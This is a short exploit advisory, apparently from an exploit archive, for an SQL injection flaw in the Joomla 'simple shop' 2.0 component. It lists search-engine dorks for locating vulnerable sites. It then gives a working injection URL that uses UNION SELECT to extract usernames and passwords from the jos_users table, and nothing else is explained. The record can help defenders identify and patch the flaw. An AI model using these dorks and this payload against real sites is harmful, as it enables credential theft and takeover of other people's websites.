id: 2687
date: 02/23/2008
title: Joomla Component simple shop 2.0 SQL Injection Vulnerability
author: S@BUN
cves: 

============================================================
Joomla Component simple shop 2.0 SQL Injection Vulnerability
============================================================



###############################################################
#
# joomla com_simpleshop SQL Injection(section)
#
################################################################
#
# DORK 1 : allinurl:"com_simpleshop"
#
# DORK 2 : allinurl: "com_simpleshop"section
#
################################################################
EXPLOIT :

index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*





#  0day.today [2023-03-26]  #